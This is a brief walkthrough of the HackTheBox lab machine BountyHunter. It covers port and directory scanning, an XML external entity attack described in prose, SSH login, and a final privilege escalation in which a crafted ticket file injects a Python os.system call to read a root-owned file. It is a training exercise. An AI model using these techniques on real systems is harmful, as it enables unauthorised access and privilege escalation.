HackTheBox: BountyHunter Walkthrough
InfoGather
This is the target site. There are three sections on the site.
Scan
Let’s scan for open ports with Nmap
Command: nmap -A 10.10.11.100
We have two open ports.
Find the appropriate extensions to the link via Dirb.
Command: dirb http://10.10.11.100/
Let’s look at the link
We know that the database is inside .php files. So let’s use it in a search
Command: dirb http://10.10.11.100/ -X .php
We found the db.php file
Let’s take a look at the burp
We came to this site using a link in the portal section and found a strange information file here
Enumeration
Since it is a hash, you need to decode it first.
Let’s decode it first as Url and then as Base64.
And here we found the xml vulnerability on the site. It is enough to do research to exploit it.
Let’s choose the required payload
Let’s change the payload we find according to ourselves.
And let’s hash again for system recognition
First Base64 encode the next Url
Then let’s look at the answer through burp
Now we have found the username.
Let’s check the contents of the .php document we found earlier.
To do this, select the appropriate payload
Let’s make changes.
Let’s look at the answer
In response, let’s decode a hash code and look at the answer.
We found some important information.
Our 22 port was open. Try to connect
Gaining Access
Command: ssh development@10.10.11.100
Find the user flag
Findout the user flag and submit to htb.
Now let’s get to the root
Command: sudo -l
Let’s check the file
Command: cat ‘Location of the file’
We learned by reading this python script that this script requires us to enter a file name and a file name ending in .md. If the condition is met, the script opens the file and looks for the next condition.
Let’s write a file to allow it to fulfill the .md conditions
Command: nano test.md
# Skytrain Inc
## Ticket to
__Ticket Code:__
**200+ 24 == 224 and __import__(‘os’).system(‘cat /root/root.txt’) == False
Let’s check
Findout the root flag and submit to htb.